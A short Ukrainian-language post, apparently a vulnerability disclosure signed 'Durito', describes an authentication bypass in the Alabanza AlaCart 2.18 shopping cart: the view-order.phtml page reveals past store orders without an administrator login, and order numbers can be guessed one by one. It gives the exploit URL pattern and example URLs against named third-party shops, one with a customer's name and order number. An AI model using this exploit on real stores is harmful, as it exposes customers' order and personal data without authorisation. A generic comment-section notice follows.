Уразливість в системі AlaCart Version 2.18
Мною виявлена уразливість в системі AlaCart Version 2.18 Application: Alabanza AlaCart Shopping Cart
Exploit: http://www.xxx.com/s-cart/view-order.phtml?f_strFirstName=[любые символи] & f_strLastName = [будь-які символи] & f_intOrderID = [номер транзакції] Файл view-order.phtml дозволяє переглядати інформацію про проведені раніше транзакціях магазину, минаючи введення пароля / логіна адміністратора. Номер транзакції підбирається звичайним перебором 1,2,3 ... 121 і так далі. У разі відсутності запису про наявної транзакції, відповідь сервера: Order # 135 could not be found or does not exist. приклад: http://alacart.metapros.net/s-cart/view-order.phtml?f_strFirstName=Jeff&f_strLastName=Daggs&f_intOrderID=135 Приклад уразливості: http://notebookmaker.com/s-cart/view-order.phtml?f_strFirstName=aaa&f_strLastName=aaaa&f_intOrderID=129
Твій bug Durito.
|
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.